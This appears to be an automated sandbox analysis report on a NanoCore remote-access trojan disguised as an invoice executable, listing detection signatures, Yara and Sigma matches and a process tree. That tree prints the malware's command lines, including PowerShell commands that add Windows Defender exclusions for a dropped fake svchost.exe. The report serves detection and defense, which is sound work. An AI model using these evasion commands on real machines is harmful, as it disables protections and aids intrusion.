
Analysis Report CN-Invoice-XXXXX9808-19011143287990.exe

Overview

General Information

Sample Name: CN-Invoice-XXXXX9808-19011143287990.exe
Analysis ID: 355838
MD5: a656f522f604872e02daee9dbc458d9c
SHA1: e463d219a1d4dbde375e4f53c2fc250d6ee9d7f1
SHA256: a0ebcb3078763eb8acca534831ef9ca1a213347328698aa3cda7c5bd23cd81d8
Tags: exe, FedEx, NanoCore, RAT

Most interesting Screenshot:

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide a thread from the debugger
Drops PE files with benign system names
Executable has a suspicious name (potential lure to open the executable)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to delay execution (extensive OutputDebugStringW loop)
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • CN-Invoice-XXXXX9808-19011143287990.exe (PID: 5604 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' MD5: A656F522F604872E02DAEE9DBC458D9C)
    • powershell.exe (PID: 1552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 5380 cmdline: 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6268 cmdline: 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6552 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6752 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • CasPol.exe (PID: 7108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • WerFault.exe (PID: 6188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 2564 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6356 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6364 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6484 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6508 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • svchost.exe (PID: 6700 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6772 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6944 cmdline: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' MD5: A656F522F604872E02DAEE9DBC458D9C)
      • powershell.exe (PID: 5584 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AdvancedRun.exe (PID: 844 cmdline: 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • svchost.exe (PID: 6964 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 7092 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 7152 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6172 cmdline: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' MD5: A656F522F604872E02DAEE9DBC458D9C)
  • svchost.exe (PID: 4568 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4560 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6684 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x110c5:$x1: NanoCore.ClientPluginHost
  • 0x43ee5:$x1: NanoCore.ClientPluginHost
  • 0x76b05:$x1: NanoCore.ClientPluginHost
  • 0x11102:$x2: IClientNetworkHost
  • 0x43f22:$x2: IClientNetworkHost
  • 0x76b42:$x2: IClientNetworkHost
  • 0x14c35:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x47a55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x7a675:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0x10e2d:$a: NanoCore
  • 0x10e3d:$a: NanoCore
  • 0x11071:$a: NanoCore
  • 0x11085:$a: NanoCore
  • 0x110c5:$a: NanoCore
  • 0x43c4d:$a: NanoCore
  • 0x43c5d:$a: NanoCore
  • 0x43e91:$a: NanoCore
  • 0x43ea5:$a: NanoCore
  • 0x43ee5:$a: NanoCore
  • 0x7686d:$a: NanoCore
  • 0x7687d:$a: NanoCore
  • 0x76ab1:$a: NanoCore
  • 0x76ac5:$a: NanoCore
  • 0x76b05:$a: NanoCore
  • 0x10e8c:$b: ClientPlugin
  • 0x1108e:$b: ClientPlugin
  • 0x110ce:$b: ClientPlugin
  • 0x43cac:$b: ClientPlugin
  • 0x43eae:$b: ClientPlugin
  • 0x43eee:$b: ClientPlugin
Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604 | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xb77275:$x1: NanoCore.ClientPluginHost
  • 0xb95f49:$x1: NanoCore.ClientPluginHost
  • 0xbb4b30:$x1: NanoCore.ClientPluginHost
  • 0xb772d6:$x2: IClientNetworkHost
  • 0xb95faa:$x2: IClientNetworkHost
  • 0xbb4b91:$x2: IClientNetworkHost
  • 0xb7c6db:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0xb8a64d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0xb9b3af:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0xba9321:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0xbb9f96:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0xbc7f08:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604 | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xe105:$x1: NanoCore Client.exe
  • 0xe38d:$x2: NanoCore.ClientPluginHost
  • 0xf9c6:$s1: PluginCommand
  • 0xf9ba:$s2: FileCommand
  • 0x1086b:$s3: PipeExists
  • 0x16622:$s4: PipeCreated
  • 0xe3b7:$s5: IClientLoggingHost
0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xe0f5:$a: NanoCore
  • 0xe105:$a: NanoCore
  • 0xe339:$a: NanoCore
  • 0xe34d:$a: NanoCore
  • 0xe38d:$a: NanoCore
  • 0xe154:$b: ClientPlugin
  • 0xe356:$b: ClientPlugin
  • 0xe396:$b: ClientPlugin
  • 0xe27b:$c: ProjectData
  • 0xec82:$d: DESCrypto
  • 0x1664e:$e: KeepAlive
  • 0x1463c:$g: LogClientMessage
  • 0x10837:$i: get_Connected
  • 0xefb8:$j: #=q
  • 0xefe8:$j: #=q
  • 0xf004:$j: #=q
  • 0xf034:$j: #=q
  • 0xf050:$j: #=q
  • 0xf06c:$j: #=q
  • 0xf09c:$j: #=q
  • 0xf0b8:$j: #=q
0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Sigma Overview

System Summary:

Sigma detected: NanoCore
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 7108, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
Sigma detected: Executables Started in Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
Sigma detected: Execution in Non-Executable Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
Sigma detected: Suspicious Program Location Process Starts
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
Sigma detected: System File Execution Location Anomaly
Source: Process started | Author: Florian Roth, Patrick Bareiss | Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944

Signature Overview


AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: CN-Invoice-XXXXX9808-19011143287990.exe | ReversingLabs: Detection: 25%
Yara detected Nanocore RAT
Source: Yara match | File source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: CN-Invoice-XXXXX9808-19011143287990.exe | Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: CN-Invoice-XXXXX9808-19011143287990.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: CN-Invoice-XXXXX9808-19011143287990.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbo source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdbb440 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: ml.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: ility.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
Source: Binary string: fwpuclnt.pdb\4B0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc.pdbZ4\0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb+_ source: WerFault.exe, 0000001E.00000003.353042308.00000000057F5000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3Zl source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
Source: Binary string: winnsi.pdb03 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdbJ source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb= source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb@! source: WERCCD7.tmp.dmp.30.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdbF source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: i.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: indows.Forms.pdb&& source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb@4V0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: ility.pdbn source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdbR source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
